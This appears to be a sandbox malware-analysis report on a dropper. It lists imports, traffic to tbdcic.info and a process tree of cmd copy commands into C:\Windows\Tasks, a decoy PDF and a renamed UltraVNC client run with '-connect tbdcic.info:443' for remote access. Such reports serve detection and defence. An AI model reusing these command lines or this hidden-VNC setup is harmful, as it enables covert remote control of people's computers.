                                                                  USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                                  ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                  OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                                  KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                                  MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  RussianRussia
                                                                  EnglishUnited States
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 23, 2024 13:37:42.853419065 CET49738443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:42.853450060 CET44349738194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:42.853645086 CET49738443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:42.853758097 CET49738443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:42.853771925 CET44349738194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:42.853813887 CET44349738194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:42.965095043 CET49739443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:42.965133905 CET44349739194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:42.965323925 CET49739443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:42.965395927 CET49739443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:42.965404034 CET44349739194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:42.965430021 CET44349739194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:54.247061014 CET49767443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:54.247109890 CET44349767194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:54.247334003 CET49767443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:54.247526884 CET49767443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:37:54.247539997 CET44349767194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:37:54.247597933 CET44349767194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:38:16.758567095 CET49815443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:38:16.758614063 CET44349815194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:38:16.758722067 CET49815443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:38:16.758826017 CET49815443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:38:16.758833885 CET44349815194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:38:16.758938074 CET44349815194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:38:50.093080997 CET49894443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:38:50.093132973 CET44349894194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:38:50.093242884 CET49894443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:38:50.093342066 CET49894443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:38:50.093354940 CET44349894194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:38:50.093422890 CET44349894194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:39:35.609105110 CET49994443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:39:35.609159946 CET44349994194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:39:35.609253883 CET49994443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:39:35.609430075 CET49994443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:39:35.609442949 CET44349994194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:39:35.609493017 CET44349994194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:40:31.212028980 CET49997443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:40:31.212091923 CET44349997194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:40:31.212197065 CET49997443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:40:31.212282896 CET49997443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:40:31.212295055 CET44349997194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:40:31.212428093 CET44349997194.190.152.201192.168.2.5
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 23, 2024 13:37:37.045074940 CET6140853192.168.2.51.1.1.1
                                                                  Dec 23, 2024 13:37:42.611947060 CET5072753192.168.2.51.1.1.1
                                                                  Dec 23, 2024 13:37:42.749808073 CET53507271.1.1.1192.168.2.5
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 23, 2024 13:37:37.045074940 CET192.168.2.51.1.1.10xd3beStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:37:42.611947060 CET192.168.2.51.1.1.10xc47cStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 23, 2024 13:37:37.351146936 CET1.1.1.1192.168.2.50xd3beNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 23, 2024 13:37:39.133418083 CET1.1.1.1192.168.2.50xa2c9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:37:39.133418083 CET1.1.1.1192.168.2.50xa2c9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:37:42.749808073 CET1.1.1.1192.168.2.50xc47cNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:38:45.647787094 CET1.1.1.1192.168.2.50x6baaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:38:45.647787094 CET1.1.1.1192.168.2.50x6baaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:07:37:22
                                                                  Start date:23/12/2024
                                                                  Path:C:\Users\user\Desktop\mSRW5AfJpC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\mSRW5AfJpC.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'648'766 bytes
                                                                  MD5 hash:95BB89EBDCEC89E123E5647555D63AED
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:07:37:23
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:07:37:23
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:07:37:23
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:07:37:23
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:07:37:23
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:07:37:23
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:07:37:24
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:07:37:25
                                                                  Start date:23/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                  Imagebase:0x7ff686a00000
                                                                  File size:5'641'176 bytes
                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:07:37:25
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:07:37:26
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /f /im sync_browser.exe
                                                                  Imagebase:0x920000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:07:37:26
                                                                  Start date:23/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                  Imagebase:0x7ff6413e0000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:13
                                                                  Start time:07:37:26
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:07:37:26
                                                                  Start date:23/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                  Imagebase:0x7ff6413e0000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:16
                                                                  Start time:07:37:29
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:07:37:31
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:07:37:33
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Tasks\sync_browser.exe
                                                                  Imagebase:0x7ff740000000
                                                                  File size:1'945'368 bytes
                                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:false

                                                                  Target ID:20
                                                                  Start time:07:37:33
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 8
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:07:37:41
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443
                                                                  Imagebase:0x7ff740000000
                                                                  File size:1'945'368 bytes
                                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:07:37:41
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 2
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:07:37:43
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 4
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:07:37:47
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 42
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:07:38:29
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 42
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:07:39:11
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 42
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:07:39:53
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 42
                                                                  Imagebase:0xad0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:19.5%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:26.5%
                                                                    Total number of Nodes:1638
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 ??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 